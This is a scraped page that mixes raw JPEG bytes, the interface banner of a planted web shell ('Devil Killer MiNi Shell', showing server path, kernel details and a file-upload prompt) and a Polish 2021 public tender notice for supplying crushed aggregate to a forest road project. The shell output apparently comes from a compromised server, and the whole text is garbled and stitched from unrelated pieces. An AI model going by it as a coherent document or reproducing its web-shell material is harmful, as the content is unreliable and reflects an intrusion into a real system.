JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210629/0009872301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00098723 z dnia 2021-06-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa kruszywa – Nadleśnictwo Poddębice, Leśnictwo Niemysłów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Lasy Państwowe Zakład Usług Leśnych we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 930186230</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">P. Czajkowskiego 11/13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">51-171</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">713252562</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zulwroclaw@wroclaw.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zulwroclaw.wroclaw.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Budownictwo drogowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa kruszywa – Nadleśnictwo Poddębice, Leśnictwo Niemysłów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-78dda106-d8db-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00098723</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00077282/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.2.2 Dostawa kruszywa kamiennego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zulwroclaw.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zulwroclaw.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy przetargowej<br/>https://zulwroclaw.logintrade.net/rejestracja/ustawowe.html , a w przypadku wystąpienia awarii<br/>platformy przetargowej uniemożliwiającej poprawną komunikację, za pośrednictwem poczty<br/>elektronicznej, e-mail: zulwroclaw@wroclaw.lasy.gov.pl , z zastrzeżeniem, że złożenie oferty następuje<br/>wyłącznie przy użyciu platformy przetargowej.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>cyfrowego odwzorowania dokumentów w postaci papierowej (elektronicznych kopii dokumentów<br/>stworzonych w postaci papierowej) oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie i instrukcjach korzystania z platformy przetargowej, dostępnych na stronie<br/>https://zulwroclaw.logintrade.net/rejestracja/ustawowe.html<br/>3. Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany<br/>jest zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https://zulwroclaw.logintrade.net/rejestracja/intstrukcje.html oraz zaakceptować regulamin korzystania z<br/>Platformy przetargowej dostępny pod adresem:<br/>https://zulwroclaw.logintrade.net/rejestracja/regulamin.html .<br/>4. Za datę przekazania oferty przyjmuje się datę jej wysłania na platformę przetargową. Za datę<br/>przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub cyfrowych<br/>odwzorowań dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w<br/>postaci papierowej) oraz innych informacji przyjmuje się datę ich wysłania na platformę przetargową, z<br/>zastrzeżeniem pkt 10.8. lit b) SWZ.<br/>5. komunikacja pomiędzy Zamawiającym a Wykonawcami, w tym w szczególności składanie<br/>oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za<br/>pośrednictwem platformy przetargowej. We wszelkiej korespondencji Zamawiający i Wykonawcy<br/>posługują się numerem postępowania wskazanym w SWZ.<br/>6. Zamawiający dopuszcza komunikację pomiędzy Zamawiającym a Wykonawcami za pośrednictwem<br/>poczty elektronicznej, e-mail: zulwroclaw@wroclaw.lasy.gov.pl , tylko w przypadku wystąpienia awarii<br/>platformy przetargowej uniemożliwiającej poprawną komunikację pomiędzy Zamawiającym a<br/>Wykonawcami. Za datę przekazania wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeń lub cyfrowych odwzorowań dokumentów w postaci papierowej (elektronicznych kopii<br/>dokumentów stworzonych w postaci papierowej) oraz innych informacji przyjmuje się datę ich przekazania na adres poczty elektronicznej Zamawiającego wskazany w zdaniu poprzedzającym.<br/>7. Sposób sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej musi być zgody z wymaganiami określonymi<br/>w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>2020 poz. 2452).<br/>8. Szczegółowe informacje zawiera rozdział 10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w rozdziale 21 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w rozdziale 21 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TZ.270.9.2021.TPBN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 154122 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia są sukcesywne dostawy kruszywa łamanego w ramach zadania<br/>inwestycyjnego pn.: „Przebudowa drogi leśnej nr 46 w leśnictwie Niemysłów na terenie<br/>Nadleśnictwa Poddębice”.<br/>2) Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku<br/>Zamówień Publicznych (CPV):<br/>Główny kod CPV: 14212300-3 – kamień pokruszony lub rozłupany<br/>3) Przedmiot zamówienia obejmuje zakup i sukcesywne dostawy do miejsca<br/>wbudowania (lokalizacji zadania inwestycyjnego) następujących materiałów:<br/>a) Kruszywo łamane o uziarnieniu ciągłym frakcji 0/63 mm w ilości 1000 ton,<br/>b) Kruszywo łamane o uziarnieniu ciągłym frakcji 0/31,5 mm w ilości 660 ton,<br/>c) Kruszywo łamane o uziarnieniu ciągłym frakcji 0/5 mm w ilości 150 ton,<br/>4) Zawilgocenie kruszywa łamanego wskazanego powyżej w momencie dostawy, nie może<br/>przekraczać 12%. <br/>5) Wskazane powyżej kruszywo musi spełniać wymagania określone w Specyfikacji Technicznej<br/>stanowiącej załącznik nr 2 do SWZ.<br/>6) Zadanie inwestycyjne w ramach którego będą realizowane dostawy zlokalizowana jest na<br/>terenach leśnych o współrzędnych geograficznych 51.873492N; 18.842376E; (województwo<br/>łódzkie, powiat poddębicki.<br/>7) Droga leśna prowadząca od drogi publicznej do miejsca realizacji zadania<br/>inwestycyjnego zapewnia możliwość wjazdu ciągnika siodłowego z naczepą.<br/>8) Dostawy będą świadczone w terminie od dnia podpisania umowy do 31.08.2021 r.<br/>9) Minimalna ilość dziennych dostaw to 250 ton. Dostawy realizowane będą w oparciu o<br/>harmonogram dostaw w dniach od poniedziałku do piątku w godzinach 07:00 – 16:00. Dostawy<br/>realizowane będą w terminie 24 godzin od zgłoszenia telefonicznego/mailowego przez<br/>przedstawiciela Zamawiającego.<br/>10)Przedmiot zamówienia winien posiadać wymagane przepisami prawa dokumenty,<br/>warunkujące dopuszczenie dostarczanego kruszywa do obrotu, w tym w szczególności: atesty,<br/>deklaracje zgodności, certyfikaty krajowe/europejskie oceny techniczne, zaświadczenie o<br/>jakości, protokoły badań.<br/>11) Szczegółowy opis zamówienia znajduje się w rozdziale 3 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">14212300-3 - Kamień pokruszony lub rozłupany</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do przedmiotu zamówienia Zamawiający jest uprawniony zlecić Wykonawcy<br/>dodatkowy zakres rzeczowy obejmujący dostawy kruszywa takie same (analogiczne), jak<br/>opisane w opisie przedmiotu zamówienia („Opcja”). Przedmiotem Opcji będą sukcesywne<br/>dostawy Kruszywa analogiczne, jak opisane w SWZ (i wycenione przez Wykonawcę w Ofercie).<br/>W ramach Opcji, wedle wyboru Zamawiającego, może zostać uruchomiona dodatkowa dostawa<br/>kruszywa wszystkich, niektórych lub jednej frakcji wskazanych w SWZ (i wycenionych przez<br/>Wykonawcę w Ofercie). Zamawiający nie jest zobowiązany do uruchomienie dostaw objętych<br/>przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich uruchomienie. Dostawy będące<br/>przedmiotem Opcji mogą zostać uruchomione w ilości stanowiącej równowartość do 20 %<br/>wartości przedmiotu zamówienia określonej zgodnie z § 8 ust 1 wzoru umowy stanowiącego<br/>załącznik nr 4 do SWZ. Podstawą określenia wartości dostaw uruchomionych w ramach Opcji (w<br/>celu określenia jej zakresu) będzie cena jednostkowa poszczególnych frakcji kruszywa zawarte<br/>w Ofercie.<br/>Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku: (1) wystąpienia potrzeby<br/>zwiększenia dostaw kruszywa na skutek warunków glebowo - terenowych bądź<br/>atmosferycznych, (2) wystąpienia konieczności wprowadzenia zmian w dokumentacji<br/>projektowej realizowanego zadania inwestycyjnego, (3) braku możliwości realizowania zadania<br/>inwestycyjnego w związku z ujawnieniem wad i błędów w dokumentacji projektowej, (4)<br/>wystąpienia cech kruszywa powodujących jego większe zużycie. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x 100 pkt x 60 %<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena brutto spośród ofert ocenianych,<br/>Co – cena brutto oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu Oferty<br/>(Załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór<br/>prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z<br/>przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z<br/>tymi przepisami.<br/>2) W ramach kryterium „Gwarancja zabezpieczenia dziennej dostawy kruszywa”<br/>oceniane będzie przyjęcie przez Wykonawcę zobowiązania umownego do<br/>wykonywania określonej ilości dziennych dostaw kruszywa (w tonach) do miejsca realizacji zadania<br/>inwestycyjnego pn.: „Przebudowa drogi leśnej nr 46 w leśnictwie Niemysłów na terenie Nadleśnictwa<br/>Poddębice” w ramach którego realizowane będą dostawy, zawarte w Ofercie (załącznik nr 1 do SWZ).<br/>W ramach kryterium „Gwarancja zabezpieczenia dziennej dostawy kruszywa” ocena ofert zostanie<br/>dokonana w następujący sposób:<br/>- Wykonawca, który zobowiązuje się do zabezpieczenia wykonania dziennej dostawy kruszywa do<br/>miejsca realizacji zadania inwestycyjnego w ilości - 250 – 300 ton – otrzyma 0 pkt<br/>- Wykonawca, który zobowiązuje się do zabezpieczenia wykonania dziennej<br/>dostawy kruszywa do miejsca realizacji zadania inwestycyjnego w ilości - 301 – 350 ton –otrzyma 10<br/>pkt<br/>- Wykonawca, który zobowiązuje się do zabezpieczenia wykonania dziennej<br/>dostawy kruszywa do miejsca realizacji zadania inwestycyjnego - w ilości 351 – 400 ton –otrzyma 20<br/>pkt<br/>- Wykonawca, który zobowiązuje się do zabezpieczenia wykonania dziennej<br/>dostawy kruszywa do miejsca realizacji zadania inwestycyjnego w ilości - 401 – 450 ton –otrzyma 30<br/>pkt<br/>- Wykonawca, który zobowiązuje się do wykonania dziennej dostawy kruszywa do miejsca realizacji<br/>zadania inwestycyjnego w ilości 451 ton i więcej – otrzyma 40 pkt<br/>Jeżeli Wykonawca nie wskaże w formularzu oferty (załącznik nr 1 do SWZ) ilości dziennych dostaw<br/>kruszywa (w tonach) do miejsca realizacji zadania inwestycyjnego pn.: „Przebudowa drogi leśnej nr 46<br/>w leśnictwie Niemysłów na terenie Nadleśnictwa Poddębice”, jakie gwarantuje dostarczyć, to<br/>Zamawiający uzna, że gwarantuje minimalne ilości określone w pkt 3.1. ppkt 16) SWZ i przyzna 0 pkt.<br/>3) Całkowita liczba punktów, jaką otrzyma dane oferta, zostanie obliczona wg<br/>poniższego wzoru: L = C + G<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Cena ofertowa brutto”,<br/>G – punkty uzyskane w kryterium „Gwarancja zabezpieczenia dziennej dostawy<br/>kruszywa”,<br/>Za najkorzystniejszą ofertę uznana zostanie Oferta wykonawcy, która uzyska największą sumę<br/>punktów uzyskanych w ww. kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja zabezpieczenia dziennej dostawy kruszywa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> I. W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów.<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w<br/>postępowaniu w odniesieniu do warunku dot. sytuacji ekonomicznej. Warunek w odniesieniu do<br/>sytuacji finansowej, zostanie spełniony, jeśli Wykonawca wykaże, że posiada środki finansowe<br/>lub zdolność kredytową nie mniejszą niż 150 000,00 zł.<br/>4) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że w okresie ostatnich 3 lat od dnia w którym upływa termin składania ofert (a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie) zrealizował lub realizuje (przy czym<br/>w tym przypadku będzie liczona wartość zrealizowanej części przedmiotu umowy) co najmniej 2<br/>dostawy (przez dostawę rozumie się wykonywanie dostawy na podstawie 1 umowy) polegające<br/>na wykonywaniu dostawy kruszywa, na kwotę nie mniejszą niż 100 000,00 zł brutto każda.<br/>b) Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału<br/>w postępowaniu w odniesieniu do warunku dot. potencjału technicznego.<br/>c) Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału<br/>w postępowaniu w odniesieniu do warunku dot. osób skierowanych przez wykonawcę do<br/>realizacji zamówienia.<br/>II. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o<br/>których mowa w rozdziale 9 SWZ.<br/>III. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>warunki udziału w postępowaniu określone w pkt 7.1. SWZ powinni spełniać łącznie wszyscy<br/>Wykonawcy.<br/>IV. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych. W odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na<br/>zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty<br/>budowlane, do realizacji, których te zdolności są wymagane.<br/>Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na<br/>wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w<br/>pkt 7.1. ppkt 3) i 4) SWZ, a także bada, czy nie zachodzą wobec tego podmiotu podstawy<br/>wykluczenia, które zostały przewidziane w pkt 6.1. i 6.3. SWZ względem wykonawcy.<br/>Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą,<br/>który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez<br/>Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za<br/>nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu<br/>udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu lub zachodzą wobec tego podmiotu podstawy 